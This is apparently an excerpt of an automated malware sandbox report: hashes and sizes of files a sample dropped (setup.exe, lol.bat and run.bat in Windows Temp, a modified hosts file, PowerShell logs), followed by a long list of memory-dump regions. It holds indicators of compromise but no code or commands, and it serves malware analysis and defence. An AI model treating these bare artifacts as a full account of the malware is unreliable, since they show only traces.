MD575d1b8a2a0017cc8634a0e5ad4c1cead
SHA1c4a70d4ff8aeb49e4fc75638c656247b04710585
SHA256d81fdaed260143f212e4e7d46f0ed4913897c67e3d057b0e459ddde01009171f
SHA512cc642577711774eafc54faf9ccc920d6485ee0255044c5bc96532d028598c59d28008712c0b63f7be589b9c7400460c1a7aff7a2226030a386ad34073730c60d
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\DEA9A74F8A5FD9E6E106F171664C0B96Filesize
556B
MD5f7a6b5c0b3a35082977e6e3d6f30f11e
SHA143f7e0ed2cb0149f4adbb5f91ba8b3580d3d500a
SHA2560d5ab85f8181585f41cb2093ef2ec4e6a5dce7e9804645efb0d82441eb87d27d
SHA51224044c8db2325e4104a87140c7dee1d1f71e4780e92d753c80879aa44b6769a6ff5d9d2a5e37053c9f762fc0e5691bb3ba592fed8d39014391111f8ca9139319
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\Windows\3720402701\2219095117.priFilesize
207KB
MD5e2b88765ee31470114e866d939a8f2c6
SHA1e0a53b8511186ff308a0507b6304fb16cabd4e1f
SHA256523e419d2fa2e780239812d36caa37e92f8c3e6a5cd9f18f0d807c593effa45e
SHA512462e8e6b4e63fc6781b6a9935b332a1dc77bfb88e1de49134f86fd46bd1598d2e842902dd9415a328e325bd7cdee766bd9473f2695acdfa769ffe7ba9ae1953d
-
C:\Windows\Temp\lol.batFilesize
59B
MD5f580e0e80cc87b25e38ea2c0c8059d04
SHA1299f51dca9c609d6da86f93c424e39c1e6ba0d94
SHA2569e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734
SHA5125a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d
-
C:\Windows\Temp\run.batFilesize
98B
MD5731afe244b2414169a5f630d52646e56
SHA1e3771ccdccd8c306ee5fc4f264cfc3310690458c
SHA2566c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552
SHA51284e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1
-
C:\Windows\Temp\setup.exeFilesize
7.3MB
MD584029d73b99cc7e8b7e80d61143a532f
SHA1518c2673fb0de02b6eab1fb7f2a28e46761370ba
SHA256e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772
SHA51250ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62
-
C:\Windows\Temp\setup.exeFilesize
7.3MB
MD584029d73b99cc7e8b7e80d61143a532f
SHA1518c2673fb0de02b6eab1fb7f2a28e46761370ba
SHA256e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772
SHA51250ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD55d574dc518025fad52b7886c1bff0e13
SHA168217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA51221de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e2d46bffd1d9300639cac360fac02cb4
SHA1fd2b4813c8ab610294b6759192ca05bad5bb8958
SHA25694ffe575e92d3bab6173fd7eca207088c8b374de79d93dddf45101048c0bead3
SHA51254b1ea5f5bb1d8a402fbb5ab8f0d7bec9aa47cb48a4c411ee8032648a97efe466d9d8e7f87c5ac288e994eeb47e034eac94bb3631955f9ba2270d687e7620535
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5c5227366b7a688ff23b01788718251aa
SHA19795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA5128b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
memory/508-642-0x0000000000000000-mapping.dmp
-
memory/516-340-0x0000000000000000-mapping.dmp
-
memory/532-324-0x0000000000000000-mapping.dmp
-
memory/608-327-0x0000000000000000-mapping.dmp
-
memory/640-640-0x0000000000000000-mapping.dmp
-
memory/816-625-0x0000000000000000-mapping.dmp
-
memory/888-337-0x0000000000000000-mapping.dmp
-
memory/1352-623-0x0000000000000000-mapping.dmp
-
memory/1364-341-0x0000000000000000-mapping.dmp
-
memory/1532-345-0x0000000000000000-mapping.dmp
-
memory/1768-322-0x0000000000000000-mapping.dmp
-
memory/1888-325-0x0000000000000000-mapping.dmp
-
memory/1976-330-0x0000000000000000-mapping.dmp
-
memory/2104-329-0x0000000000000000-mapping.dmp
-
memory/2196-641-0x0000000000000000-mapping.dmp
-
memory/2196-338-0x0000000000000000-mapping.dmp
-
memory/2344-331-0x00007FFA0BF20000-0x00007FFA0C0FB000-memory.dmpFilesize
1.9MB
-
memory/2344-195-0x0000000000400000-0x00000000010C4000-memory.dmpFilesize
12.8MB
-
memory/2344-178-0x0000000000000000-mapping.dmp
-
memory/2344-196-0x00007FFA0BF20000-0x00007FFA0C0FB000-memory.dmpFilesize
1.9MB
-
memory/2344-181-0x0000000000400000-0x00000000010C4000-memory.dmpFilesize
12.8MB
-
memory/2404-326-0x0000000000000000-mapping.dmp
-
memory/2420-328-0x0000000000000000-mapping.dmp
-
memory/3060-334-0x0000000000000000-mapping.dmp
-
memory/3184-336-0x0000000000000000-mapping.dmp
-
memory/3184-639-0x0000000000000000-mapping.dmp
-
memory/3192-182-0x0000000000000000-mapping.dmp
-
memory/3308-333-0x0000000000000000-mapping.dmp
-
memory/3320-624-0x0000000000000000-mapping.dmp
-
memory/3428-332-0x0000000000000000-mapping.dmp
-
memory/3852-183-0x0000000000000000-mapping.dmp
-
memory/3868-264-0x00000178FC800000-0x00000178FC876000-memory.dmpFilesize
472KB
-
memory/3868-258-0x00000178FA560000-0x00000178FA582000-memory.dmpFilesize
136KB
-
memory/3868-245-0x0000000000000000-mapping.dmp
-
memory/3904-174-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-147-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-165-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-166-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-167-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-168-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-169-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-170-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-171-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-172-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-173-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-140-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-175-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-176-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-177-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-139-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-164-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-138-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-162-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-161-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-160-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-159-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-158-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-119-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-163-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-137-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-136-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-157-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-156-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-155-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-114-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-120-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-135-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-154-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-153-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-134-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-152-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-151-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-150-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-149-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-148-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-121-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-146-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-122-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-145-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-133-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-144-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-132-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-131-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-130-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-129-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-123-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-124-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-125-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-126-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-115-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-141-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-116-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-142-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-117-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-143-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-118-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-128-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3904-127-0x0000000077B30000-0x0000000077CBE000-memory.dmpFilesize
1.6MB
-
memory/3932-215-0x0000025BD16B0000-0x0000025BD1ACE000-memory.dmpFilesize
4.1MB
-
memory/3932-217-0x0000025BB6670000-0x0000025BB6A8E000-memory.dmpFilesize
4.1MB
-
memory/3976-335-0x0000000000000000-mapping.dmp
-
memory/4028-621-0x0000000000000000-mapping.dmp
-
memory/4076-323-0x0000000000000000-mapping.dmp
-
memory/4204-620-0x0000000000000000-mapping.dmp
-
memory/4208-480-0x000002917F120000-0x000002917F1D9000-memory.dmpFilesize
740KB
-
memory/4208-465-0x000002917CE20000-0x000002917CE3C000-memory.dmpFilesize
112KB
-
memory/4208-517-0x000002917CE40000-0x000002917CE4A000-memory.dmpFilesize
40KB
-
memory/4208-436-0x0000000000000000-mapping.dmp
-
memory/4224-656-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/4224-654-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/4224-646-0x000000014036EAC4-mapping.dmp
-
memory/4296-622-0x0000000000000000-mapping.dmp
-
memory/4360-617-0x0000000000000000-mapping.dmp
-
memory/4424-643-0x0000000000000000-mapping.dmp
-
memory/4428-613-0x0000000000000000-mapping.dmp
-
memory/4484-614-0x0000000000000000-mapping.dmp
-
memory/4540-615-0x0000000000000000-mapping.dmp
-
memory/4556-628-0x0000000000000000-mapping.dmp
-
memory/4560-627-0x0000000000000000-mapping.dmp
-
memory/4604-402-0x0000000000000000-mapping.dmp
-
memory/4612-637-0x000001E268290000-0x000001E268297000-memory.dmpFilesize
28KB
-
memory/4612-635-0x000001E268450000-0x000001E268456000-memory.dmpFilesize
24KB
-
memory/4624-403-0x0000000000000000-mapping.dmp
-
memory/4644-404-0x0000000000000000-mapping.dmp
-
memory/4664-405-0x0000000000000000-mapping.dmp
-
memory/4684-406-0x0000000000000000-mapping.dmp
-
memory/4692-644-0x0000000000000000-mapping.dmp
-
memory/4704-407-0x0000000000000000-mapping.dmp
-
memory/4724-408-0x0000000000000000-mapping.dmp
-
memory/4744-409-0x0000000000000000-mapping.dmp
-
memory/4764-410-0x0000000000000000-mapping.dmp
-
memory/4784-411-0x0000000000000000-mapping.dmp
-
memory/4804-412-0x0000000000000000-mapping.dmp
-
memory/4820-609-0x0000000000000000-mapping.dmp
-
memory/4936-610-0x0000000000000000-mapping.dmp
-
memory/4944-651-0x0000000000000000-mapping.dmp
-
memory/4952-652-0x0000000000000000-mapping.dmp
-
memory/4964-616-0x0000000000000000-mapping.dmp
-
memory/4972-653-0x0000000000000000-mapping.dmp
-
memory/4972-611-0x0000000000000000-mapping.dmp
-
memory/4984-424-0x0000000000400000-0x00000000010C4000-memory.dmpFilesize
12.8MB
-
memory/4984-420-0x0000000000000000-mapping.dmp
-
memory/4984-425-0x00007FFA0BF20000-0x00007FFA0C0FB000-memory.dmpFilesize
1.9MB
-
memory/5012-618-0x0000000000000000-mapping.dmp
-
memory/5056-626-0x00000232B2DB0000-0x00000232B2DB6000-memory.dmpFilesize
24KB
-
memory/5056-629-0x00000232B2DE0000-0x00000232B2DF2000-memory.dmpFilesize
72KB
-
memory/5104-619-0x0000000000000000-mapping.dmp